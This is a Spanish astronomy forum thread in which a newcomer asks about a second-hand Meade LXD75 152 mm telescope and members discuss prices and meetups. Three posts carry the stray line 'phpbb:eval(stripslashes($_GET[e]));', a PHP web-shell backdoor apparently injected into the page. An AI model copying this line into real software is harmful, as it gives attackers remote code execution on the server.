Presentacion & Meade LXD75 152 mm. AYUDA!

Consultas generales
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por ender »

Hola a todos, me presento, me llamo Angel y soy de la zona de Pueblo Nuevo, he conocido la existencia de la asociación gracias a un amigo que es de Coslada. Parece que la asociación tiene buena pinta y me gustaria formar parte de ella ya que me pilla bastante cerca de casa. Mando un correo a la direccion que facilitais en la Web para saber como hacerme socio.

Bueno, dicho esto queria realizar una consulta sobre un teles que voy a adquirir. El aparato en cuestion es un MEADE LXD75 de 152mm con montura ecuatorial EQ5 motorizada en AR. Creo que es un buen telescopio con buena optica y que esta al limite de tamaño porque uno ya de 200mm me parece demasiado grande para transportarlo. ¿Que opinion les merece el aparato?
¿Me pueden recomendar algun otro?. Me interesa un aparato que sea versatil, que me sirva tanto para observcion como para la fotografia, por lo que tengo entendido estos teles de MEADE son bastante versatiles.

Intentare asistir a la quedada del Jueves con mi nuevo cacharrete, ;) ).

Muchas gracias. Saludos.
alnitakzetaorionis
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por m3ntol »

Hola Ender!
el telescopio en cuestión es bastante conocido ya que salieron a la venta en Lidl a un precio increiblemente bueno. Lo único que no me cuadra es la montura ya que Lidl los vendía con la montura GOTO típica del LXD75.

¿Es de segunda mano? mucha gente compró el telescopio solo por la montura y luego vendieron su antigua montura con el tubo del LDX75. Si no es indiscreción ¿por cuanto te lo venden? ten en cuenta que Lidl los vendía a 499
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por astrolozano »

Bueno, unas matizaciones:

Hay varios modelos de LXD75. Supongo que hablas del newton. Como ya te han comentado, ¿puedes decirnos el precio?

En lidl salió con la montura LXD75 con autostar, etc. por 349
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por ender »

Hola a todos, gracias por las respuestas. Voy contestando:

- El teles lo compro de segunda mano pero esta totalmente nuevo, solo tiene un par de usos.
- Lo compro por 270
alnitakzetaorionis
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por m3ntol »

En efecto hay varios modelos de LXD75, supongo que se refiera al del Lidl que era un reflector newton.
Creo recordar que el precio inicial de la oferta era de 499
phpbb:eval(stripslashes($_GET[e]));
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por ender »

Thanks m3ntol. Oye como hago para subir imagenes al repositorio?, no veo ningun link para ello y he buscado en el foro pero nada.

Gracias.
alnitakzetaorionis
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por m3ntol »

Hola Ender,
las imágenes las puedes subir a algún servidor gratuito como imageshack ( http://imageshack.us/ ) y luego las enlazas desde el mensaje.

El precio me parece razonable, todo depende del estado del material claro. Si el vendedor es de confianza pues adelante con ello. Ya sabes, si luego sale malo le buscamos y le rompemos las piernas :lol: :lol: :lol:

La montura es buena y te va a valer para futuros telescopios mayores, además le puedes comprar más adelante el sistema GOTO y de seguimiento. Quizá lo veo corto en dotación. Un solo ocular de 26mm te va a dejar con ganas de más!!

Vente el jueves con el trasto y te dejamos probar otros oculares así decides cual te va mejor. Ya nos contarás como ha ido el tema.
phpbb:eval(stripslashes($_GET[e]));
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por ender »

jejejeje, ya te digo que si le busco. En principio me fio. El link que me pones me lo capa la seguridad del curro (ya, ya se que tendria que estar currando y no posteando :lol: ) a si que cuando este en casa ya las subo y os las paso.

La quedada es para el Jueves 26, no?, es que lei mal y creia que era el Jueves de esta semana. No voy a poder ir porque para el 26 estare de VACACIONES!!. Estare atento a la web para ver si haceis otro encuentro.

Saludos.
alnitakzetaorionis
ender
Mensajes: 67
Registrado: Dom Jul 15, 2007 8:58 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por ender »

alnitakzetaorionis
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion & Meade LXD75 152 mm. AYUDA!

Mensaje por astrolozano »

Es mi chiquitín :lol:
Es un newton 6" a f/5. Por ese precio, si la montura esá bien, adelante.
Si quereis organizamos algo para este jueves, porque el viernes me voy de vacaciones :D aunque sea por un sitio cerquita en lugar de ir hasta Pioz...
Responder